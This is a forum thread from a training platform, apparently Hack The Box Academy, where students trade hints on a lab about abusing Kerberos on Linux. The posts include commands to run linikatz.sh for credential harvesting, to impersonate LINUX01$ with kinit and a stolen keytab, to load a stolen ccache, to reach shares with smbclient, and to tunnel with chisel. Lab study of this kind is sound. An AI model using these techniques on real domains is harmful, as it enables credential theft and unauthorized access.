Hi guys,
I’m so terribly stuck on the last question which is:
Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
Can you give me some hint on where to find this linux ticket? I’m root on svc_workstations but can’t seem to find a valid ticket and keep getting access denied each time I try to connect to dc01/linux01 with smbclient. Many thanks in advance
consider using linikatz.sh
(you need to transfer the file)
is this the one I’m looking for?
Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
Default principal: LINUX01$@INLANEFREIGHT.HTB
I transferred linikatz.sh and still can’t seem to see the proper ticket. Those I tried each gave me a message “no valid credentials found” .
Here is a suggestion for you, download linikatz from the attack machine(kaili or pwnbox) then use base64 to encode it and decode it with base64 on linux01(root privilege) machine. From there, as instructed in the section, you will find the ticket cache right at the beginning of the scan results.
Hi, thanks a lot. I did it before but I made a terrible mistake and provided a wrong path while assigning the variable. I don’t know why I kept root in the path. Solved it now and I feel relieved. Many thanks for your response. Have a good day
I transfered linikatz.sh to and ran it on Linux01. Got the credentials in the folder. Tried the files under kerberos-check ending with .conf and .keytab with path /etc. Didn’t work. Also tried ccache files and no result. Am I looking for only NTLM hash?
If you have access to root user credentials on svc_workstations, try using the kinit utility to reacquire the Kerberos ticket. After this, you can try to connect to the \DC01\linux01 resource using smbclient using the received ticket. Remember to also check that you entered the correct username and password when you receive your ticket using kinit.
Thank you. Got it solved.
If anyone else is struggling.
Run Linikatz
Youll notice a keytab in /etc in the output
kinit LINUX01$ -k -t /path/to/keytab
Then
smbclient //dc01/linux01 -k -c “get /flag.txt /root/flag.txt”
Hello sir may I kindly asked u how u know we can use that particular file for impersonate. I got the solution but I dont understand clearly why I can use this particular file /etc/*** for the impersonation
duuuude you are a hero
Hello Guys,
I have an issue and i been stuck for more than 3 hours with this question:
Check the /tmp directory and find Julio’s Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
i loaded the ccache file in the env variable and it figures in my klist output
when i try to connect to remote server it doesn’t grant me the permission
i tried other alternatives like :
smbclient //172.16.1.10/julio -k -c 'ls' -U julio@INLANEFREIGHT.HTB
I’m conscient that the ticket change every 5 mn or something so i always update my env variable with the new generated ticket and retry but sadly nothing …
You used the wrong ticket. Look at the expiration date, you need to use the other one. Check the expiration date with klist, when it is valid you can use smbclient.
Commenting to stay updated, because I’m currently studying this module.
When I reach this question I’ll come back and post my methodology of approaching it.
Ensure you are exporting the ticket in the correct directory. I wasted several hours only to realize that the path I used was root and that I was performing operations in the home directory. In my case I changed the path of export to home directory.
Request a valid ticket using kinit.
kinit -k -t /etc/krb5.keytab ‘LINUX01$@INLANEFREIGHT.HTB’
Export it to home directory
export KRB5CCNAME=FILE:/home/svc_workstations@inlanefreight.htb/ccache_INLANEFREIGHT.HTB
klist
smbclient
Done.
Im stuck on the first part of the last question
so I’ve done the following
added these to the etc/host file
172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb ms01
added to the /etc/proxycahins4.conf
socks5 127.0.0.1 1080
followed the commands to install chisel and have it running like so
2025/03/01 14:06:56 server: Reverse tunnelling enabled
2025/03/01 14:06:56 server: Fingerprint p/jlzhQaokullD6arhj71UoR+PbqPNb/C3+AODdxTVw=
2025/03/01 14:06:56 server: Listening on HTTP : // 0.0.0.0:8080 (HTB blocked link)
initiated xfreerdp
xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution
Now here’s the issue,
I run chisel but it never connects
c:\tools>c:\tools\chisel.exe client 10.10.16.45:8080 R:socks 2025/03/01 08:18:04 client: Connecting to ws://10.10.16.45:8080 2025/03/01 08:18:25 client: Connection error: dial tcp 10.10.16.45:8080: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 2025/03/01 08:18:25 client: Retrying in 100ms…
I cant work out what the issue is